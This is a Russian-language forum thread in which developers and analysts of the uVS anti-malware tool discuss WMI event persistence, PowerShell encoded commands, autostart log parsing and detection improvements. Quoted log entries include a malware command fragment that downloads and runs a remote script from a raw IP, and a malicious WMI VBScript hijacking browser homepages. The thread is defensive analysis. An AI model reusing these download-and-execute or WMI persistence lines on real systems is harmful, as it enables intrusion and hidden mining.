Перейти к содержанию

Recommended Posts

demkd
33 минут назад, santy сказал:

а что здесь означает ключ -enc? закодированный объект?

Accepts a base-64-encoded string version of a command.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor
В 12 января 2019 г. at 5:01 PM, santy сказал:

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий


 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

Там ещё странно разобрало

 

SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://173.208.139.170/S.TXT')&POWERSHELL.EXE

+ если там нашло путь

C:\WINDOWS\UPDATE.EXE

и не нашло

S&C:\WINDOWS\UPDATE.EXE

 то может не стоит выводить в лог S&C:\WINDOWS\UPDATE.EXE ? Вроде понятно, что тут перебор с вариантами разбиения строки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 12.01.2019 at 10:17 PM, demkd сказал:

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

demkd,

а можно в данном случае применить delwmi %Sys32%\CMD.EXE, чтобы удалить все левые объекты, связанные с cmd.exe? заметно активен Dark.Galaxy или Dark Cloud (по классификации китайцев)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

PowerShell + WMI

https://github.com/FortyNorthSecurity/WMImplant

нет на них зоозащитников. :mellow:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, santy сказал:

а можно в данном случае применить delwmi %Sys32%\CMD.EXE, чтобы удалить все левые объекты, связанные с cmd.exe? заметно активен Dark.Galaxy или Dark Cloud (по классификации китайцев)

да, удалится только то что есть в разделе wmi

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Полное имя                  C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
Имя файла                   CSCRIPT.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5BD3D75129000
Linker                      9.0
Размер                      156160 байт
Создан                      14.11.2018 в 15:10:24
Изменен                     27.10.2018 в 06:11:14
                            
TimeStamp                   27.10.2018 в 03:11:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            cscript.exe.mui
Версия файла                5.8.7600.16385
Описание                    Microsoft ® Console Based Script Host
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
SHA1                        AE820F8FF22356E1EBB1475E3395CA62A8A4F84B
MD5                         75C33A5AFDCEC0AA45EE334F31B2AE58
                            
Namespace                   \\.\root\subscription
Consumer_Name               BVTConsumer
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecscript KernCap.vbs
Consumer_WorkingDirectory   C:\\tools\\kernrate
Filter_Name                 BVTFilter
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"BVTConsumer\"";
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    Filter = "__EventFilter.Name=\"BVTFilter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    EventNamespace = "root\\cimv2";
    Name = "BVTFilter";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_Processor\" AND TargetInstance.LoadPercentage > 99";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cscript KernCap.vbs";
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    Name = "BVTConsumer";
    RunInteractively = FALSE;
    WorkingDirectory = "C:\\\\tools\\\\kernrate";
};

---------------

т.е. uVS не выводит такие элементы WMI в качестве самостоятельной записи.

И будь там левак - оператор зевнёт пешку.

 

 

 

  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

К выше написанному.

Полное имя                  KERNCAP.VBS
Имя файла                   KERNCAP.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                      
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
-------------

И где здесь полезная ИНФО. ?

http://forum.esetnod32.ru/forum3/topic15125/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, PR55.RP55 сказал:

И где здесь полезная ИНФО. ?

файла то физически нет, потому и отдельного объекта нет, да и это обломки криворуких разрабов винды, абослютно безопасные.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

 

 

 

В 18.01.2019 at 8:41 AM, demkd сказал:

файла то физически нет

А если так:  https://safezone.cc/threads/dopolnenie-v-rukovodstvo-po-hijackthis-fork.27470/

Цитата

С помощью этих событий вредоносное ПО, наподобие шпионского, может собирать информацию об оборудовании и программном обеспечении. Также они могут создавать канал для связи между компьютерами, выполнять скрипт как из внешнего файла, так и встроенный (бесфайловый). События могут вызываться подсистемой WMI самостоятельно через определённые промежутки времени либо вручную какой-либо программой, выполняющей специальный запрос к WMI.
(Действие HiJackThis: потребитель события WMI, фильтр, таймер и связка удаляются, как и вызываемый ими файл, если к нему указан полный путь)

 

Цитата

 

O25 - WMI Event: Имя события - Командная строка или код.

Имя события состоит из названия поставщика и и названия фильтра.
Командная строка может приобретать вид:
 

cscript KernCap.vbs (WorkDir="C:\\tools\\kernrate")

Это значит, что программа cscript.exe запускает файл KernCap.vbs, который находится в рабочем каталоге C:\tools\kernrate

Код может содержать первые 300 байт скрипта, встроенного в событие.

Пример вредоносной записи:

O25 - WMI Event: ASEC - EventFilter sethomePage2 - Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject"):On Error Resume Next : Const link = "index": Const linkChrome = "index":browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.ex(2401 bytes)

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

В 18.01.2019 at 8:41 AM, demkd сказал:

файла то физически нет

А какая разница ?

В Инфо.: KERNCAP.VBS  нет информации которая содержится в Инфо.:  CSCRIPT.EXE

Есть файл - нет файла, а вся доступная информация должна быть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема\образ: http://www.tehnari.ru/f183/t262607/

Цитата

Полное имя                  EPRINT\HPEPRINT.EXE
Имя файла                   HPEPRINT.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\PROGRAM
CmdLine                     FILES\HP\HP EPRINT\HPEPRINT.EXE /CHECKJOBS
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\HPEA3JOBS
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB472848-2278-4AC3-9FE0-5FFA799F1336}\Actions
Actions                     "C:\Program" Files\HP\HP ePrint\hpeprint.exe /CheckJobs
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB472848-2278-4AC3-9FE0-5FFA799F1336}\


                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 минут назад, PR55.RP55 сказал:

"C:\Program" Files\HP\HP ePrint\hpeprint.exe /CheckJobs

Кто-то криворукий прописал путь, так что ничего удивительного нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

http://www.tehnari.ru/f183/t262601/

Тоже странная запись.

Полное имя                  C:\PROGRAMDATA\{01456982-0145-0145-014569822880}\LSM.EXE
Имя файла                   LSM.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MICROSOFT LOCALMANAGER[WINDOWS 8.1 SINGLE LANGUAGE]
                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

+

Крайняя форма извращения: ( там же )

Цитата

C:\USERS\USER\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\ADMIN\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\192.168.1.43\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\1\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE

uVS  поместил а Подозрительные только два файла из шести.

Предлагаю:

Автоматически помещать в Подозрительные все файлы при совпадении SHA1 ( и\или имени )

т.е. если файл  попал в подозрительные - то идёт проверка списка на совпадения.

Есть совпадение > файл в подозрительные. ( с соответствующий записью в Инфо - о причине )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
27 минут назад, PR55.RP55 сказал:

Тоже странная запись.

Полное имя                  C:\PROGRAMDATA\{01456982-0145-0145-014569822880}\LSM.EXE

И чего в ней странного? Обычный каталог с непонятным LSM.
 

18 минут назад, PR55.RP55 сказал:

при совпадении SHA1

Кто-давно не говорил что uVS медленно создает образ... :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
17 минут назад, demkd сказал:

Кто-давно не говорил что uVS медленно создает образ...

Зачем ?

Только для файлов которые попали в подозрительные.

Логика такая:  Файл в подозрительных > uVS берёт его SHA1 ( если таковая есть ) и прогоняет весь список на совпадение > если совпадение найдено - файл попадает в подозрительные > в Инфо. файла пишется информация по какой причине файл попал в подозрительные.

Да и проверку можно проводить на  готовом образе\списке.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
14 часов назад, PR55.RP55 сказал:

uVS  поместил а Подозрительные только два файла из шести.

у меня все шесть файликов сразу попали в подозрительные и вирусы при открытии образа. (без добавления новых сигнатур).

тот случай, когда образы автозапуска нужны не только для того, чтобы писать по ним скрипты, но и для пополнения баз сигнатур и правил, т.е. чтобы использовать заложенные в программе возможности к самообучению.

CoinMiner_DV.thumb.jpg.f48491b0d64d3e9baa4436e5f4eeda23.jpg

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Речь о том, что было _6_  одинаковых файлов, все файлы в \STARTUP но uVS  в подозрительные помещает только _2_ файла.

Да, настроить можно - но речь то не об этом.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
15 часов назад, PR55.RP55 сказал:

Речь о том, что было _6_  одинаковых файлов, все файлы в \STARTUP но uVS  в подозрительные помещает только _2_ файла.

Да, настроить можно - но речь то не об этом.

предполагаю, потому, что не все что лежит в папках \STARTUP автоматически запускается. (могут быть файлы из разных профилей пользователя).

для тех, кому лень добавить сигнатуру и проверить список можно добавить: функцию в раздел "статус": все файлы с данным SHA1 (или MD5) подозрительные.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
1 час назад, santy сказал:

можно добавить: функцию в раздел "статус": все файлы с данным SHA1 (или MD5) подозрительные.

Обозначив как:   Подозр SHA1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема\образ:  http://www.tehnari.ru/f35/t262699/

C:\WINDOWS\TEMP\NFRV575A.TMP\SVCHOST.EXE

CPU ( 1 core )   399,00%

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
В 30.01.2019 at 5:32 PM, PR55.RP55 сказал:

CPU ( 1 core )   399,00%

Это уже винда что-то не то вернула о свойствах процессора или время корректировалось.

Небольшое обновление:
Исправлен модуль startf, он не мог правильно определять версию Windows 10.
Из-за чего после его запуска пропадали надписи на кнопках в окнах.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Пришлось таки выпустить новую версию, заодно пополнил main.

---------------------------------------------------------

 4.1.3
---------------------------------------------------------
 o Исправлен модуль startf, он не мог правильно определять версию Windows 10.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Sandor

Опечатка в отчёте:

Цитата

Proteced process detected: Registry [96]
Proteced process detected: smss.exe [436]
Proteced process detected: csrss.exe [660]
Proteced process detected: wininit.exe [744]

Пропущена буква "t" в слове "Protected"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
34 минут назад, Sandor сказал:

Опечатка в отчёте:

спасибо, исправлю :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×